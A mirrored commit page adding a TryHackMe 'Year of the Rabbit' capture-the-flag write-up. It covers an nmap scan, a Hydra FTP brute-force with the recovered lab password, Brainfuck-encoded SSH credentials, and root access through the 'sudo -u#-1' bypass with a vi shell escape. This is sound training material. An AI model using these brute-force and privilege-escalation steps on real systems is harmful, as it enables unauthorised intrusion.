mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-21 19:43:03 +00:00
Add files via upload
This commit is contained in:
AbdullahRizwan101
GitHub
parent
12acaaca7b
commit
8bf3bfc344
1 changed files with 247 additions and 0 deletions
247
TryHackMe/YearOfRabbit.md
Normal file
247
TryHackMe/YearOfRabbit.md
Normal file
|
|
@ -0,0 +1,247 @@
|
|||
# TryHackMe-YearOfRabbit
|
||||
|
||||
>Abdullah Rizwan | 09:12 PM , 18th October
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
Nmap scan report for 10.10.20.206
|
||||
Host is up (0.17s latency).
|
||||
Not shown: 997 closed ports
|
||||
PORT STATE SERVICE VERSION
|
||||
21/tcp open ftp vsftpd 3.0.2
|
||||
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
|
||||
| ssh-hostkey:
|
||||
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|
||||
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|
||||
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|
||||
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
|
||||
80/tcp open http Apache httpd 2.4.10 ((Debian))
|
||||
|_http-server-header: Apache/2.4.10 (Debian)
|
||||
|_http-title: Apache2 Debian Default Page: It works
|
||||
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||||
|
||||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds
|
||||
|
||||
```
|
||||
## PORT 80
|
||||
|
||||
Looking at the souce and visiting `css` file we will find a hidden page `/sup3r_s3cret_fl4g/` that will say to turn off javascript. We will be brought up to a Rick rolled video.
|
||||
|
||||
## Burpsuite
|
||||
|
||||
Intercept the request on `/sup3r_s3cret_fl4g/`
|
||||
|
||||
<img src="https://imgur.com/1Jzij6l"/>
|
||||
|
||||
<img src="https://imgur.com/hzYcZ0U"/>
|
||||
|
||||
Now visiting the page `/WExYY2Cv-qU`
|
||||
|
||||
We will find an image
|
||||
|
||||
running `strings` on image
|
||||
|
||||
```
|
||||
Eh, you've earned this. Username for FTP is ftpuser
|
||||
One of these is the password:
|
||||
Mou+56n%QK8sr
|
||||
1618B0AUshw1M
|
||||
A56IpIl%1s02u
|
||||
vTFbDzX9&Nmu?
|
||||
FfF~sfu^UQZmT
|
||||
8FF?iKO27b~V0
|
||||
ua4W~2-@y7dE$
|
||||
3j39aMQQ7xFXT
|
||||
Wb4--CTc4ww*-
|
||||
u6oY9?nHv84D&
|
||||
0iBp4W69Gr_Yf
|
||||
TS*%miyPsGV54
|
||||
C77O3FIy0c0sd
|
||||
O14xEhgg0Hxz1
|
||||
5dpv#Pr$wqH7F
|
||||
1G8Ucoce1+gS5
|
||||
0plnI%f0~Jw71
|
||||
0kLoLzfhqq8u&
|
||||
kS9pn5yiFGj6d
|
||||
zeff4#!b5Ib_n
|
||||
rNT4E4SHDGBkl
|
||||
KKH5zy23+S0@B
|
||||
3r6PHtM4NzJjE
|
||||
gm0!!EC1A0I2?
|
||||
HPHr!j00RaDEi
|
||||
7N+J9BYSp4uaY
|
||||
PYKt-ebvtmWoC
|
||||
3TN%cD_E6zm*s
|
||||
eo?@c!ly3&=0Z
|
||||
nR8&FXz$ZPelN
|
||||
eE4Mu53UkKHx#
|
||||
86?004F9!o49d
|
||||
SNGY0JjA5@0EE
|
||||
trm64++JZ7R6E
|
||||
3zJuGL~8KmiK^
|
||||
CR-ItthsH%9du
|
||||
yP9kft386bB8G
|
||||
A-*eE3L@!4W5o
|
||||
GoM^$82l&GA5D
|
||||
1t$4$g$I+V_BH
|
||||
0XxpTd90Vt8OL
|
||||
j0CN?Z#8Bp69_
|
||||
G#h~9@5E5QA5l
|
||||
DRWNM7auXF7@j
|
||||
Fw!if_=kk7Oqz
|
||||
92d5r$uyw!vaE
|
||||
c-AA7a2u!W2*?
|
||||
zy8z3kBi#2e36
|
||||
J5%2Hn+7I6QLt
|
||||
gL$2fmgnq8vI*
|
||||
Etb?i?Kj4R=QM
|
||||
7CabD7kwY7=ri
|
||||
4uaIRX~-cY6K4
|
||||
kY1oxscv4EB2d
|
||||
k32?3^x1ex7#o
|
||||
ep4IPQ_=ku@V8
|
||||
tQxFJ909rd1y2
|
||||
5L6kpPR5E2Msn
|
||||
65NX66Wv~oFP2
|
||||
LRAQ@zcBphn!1
|
||||
V4bt3*58Z32Xe
|
||||
ki^t!+uqB?DyI
|
||||
5iez1wGXKfPKQ
|
||||
nJ90XzX&AnF5v
|
||||
7EiMd5!r%=18c
|
||||
wYyx6Eq-T^9#@
|
||||
yT2o$2exo~UdW
|
||||
ZuI-8!JyI6iRS
|
||||
PTKM6RsLWZ1&^
|
||||
3O$oC~%XUlRO@
|
||||
KW3fjzWpUGHSW
|
||||
nTzl5f=9eS&*W
|
||||
WS9x0ZF=x1%8z
|
||||
Sr4*E4NT5fOhS
|
||||
hLR3xQV*gHYuC
|
||||
4P3QgF5kflszS
|
||||
NIZ2D%d58*v@R
|
||||
0rJ7p%6Axm05K
|
||||
94rU30Zx45z5c
|
||||
Vi^Qf+u%0*q_S
|
||||
1Fvdp&bNl3#&l
|
||||
zLH%Ot0Bw&c%9
|
||||
```
|
||||
|
||||
## Hydra
|
||||
```
|
||||
hydra -l ftpuser -P passwords.txt ftp://10.10.20.206 -t 4
|
||||
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
|
||||
|
||||
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-18 22:06:01
|
||||
[DATA] max 4 tasks per 1 server, overall 4 tasks, 82 login tries (l:1/p:82), ~21 tries per task
|
||||
[DATA] attacking ftp://10.10.20.206:21/
|
||||
[21][ftp] host: 10.10.20.206 login: ftpuser password: 5iez1wGXKfPKQ
|
||||
[STATUS] 82.00 tries/min, 82 tries in 00:01h, 1 to do in 00:01h, 3 active
|
||||
1 of 1 target successfully completed, 1 valid password found
|
||||
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-18 22:07:03
|
||||
```
|
||||
|
||||
## FTP
|
||||
|
||||
```
|
||||
root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ftp 10.10.20.206
|
||||
Connected to 10.10.20.206.
|
||||
220 (vsFTPd 3.0.2)
|
||||
Name (10.10.20.206:root): ftpuser
|
||||
331 Please specify the password.
|
||||
Password:
|
||||
230 Login successful.
|
||||
Remote system type is UNIX.
|
||||
Using binary mode to transfer files.
|
||||
ftp> ls -la
|
||||
200 PORT command successful. Consider using PASV.
|
||||
150 Here comes the directory listing.
|
||||
drwxr-xr-x 2 0 0 4096 Jan 23 2020 .
|
||||
drwxr-xr-x 2 0 0 4096 Jan 23 2020 ..
|
||||
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
|
||||
226 Directory send OK.
|
||||
ftp>
|
||||
|
||||
```
|
||||
On getting `Eli's_Creds.txt` we will find brainfuck language
|
||||
|
||||
```
|
||||
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
|
||||
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
|
||||
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
|
||||
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
|
||||
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
|
||||
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
|
||||
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
|
||||
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
|
||||
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
|
||||
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
|
||||
<]>+. <+++[ ->--- <]>-- ---.- ----. <
|
||||
```
|
||||
`https://www.dcode.fr/brainfuck-language`
|
||||
|
||||
on decoding it
|
||||
|
||||
```
|
||||
User: eli
|
||||
Password: DSpDiM1wAEwid
|
||||
```
|
||||
This may be the ssh password for `eli`
|
||||
|
||||
## SSH
|
||||
|
||||
```
|
||||
root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ssh eli@10.10.20.206
|
||||
The authenticity of host '10.10.20.206 (10.10.20.206)' can't be established.
|
||||
ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
|
||||
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
|
||||
Warning: Permanently added '10.10.20.206' (ECDSA) to the list of known hosts.
|
||||
eli@10.10.20.206's password:
|
||||
|
||||
|
||||
1 new message
|
||||
Message from Root to Gwendoline:
|
||||
|
||||
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
|
||||
|
||||
END MESSAGE
|
||||
|
||||
|
||||
|
||||
|
||||
eli@year-of-the-rabbit:~$
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
```
|
||||
eli@year-of-the-rabbit:/home/gwendoline$ find / -type d -name "s3cr3t" 2>/dev/null
|
||||
/usr/games/s3cr3t
|
||||
```
|
||||
|
||||
```
|
||||
cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
|
||||
Your password is awful, Gwendoline.
|
||||
It should be at least 60 characters long! Not just MniVCQVhQHUNI
|
||||
Honestly!
|
||||
|
||||
Yours sincerely
|
||||
-Root
|
||||
|
||||
```
|
||||
## Previlege Escalation
|
||||
|
||||
```
|
||||
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
|
||||
```
|
||||
on the vim editor
|
||||
|
||||
:!sh
|
||||
|
||||
```
|
||||
# bash
|
||||
```
|
||||
Loading…
Reference in a new issue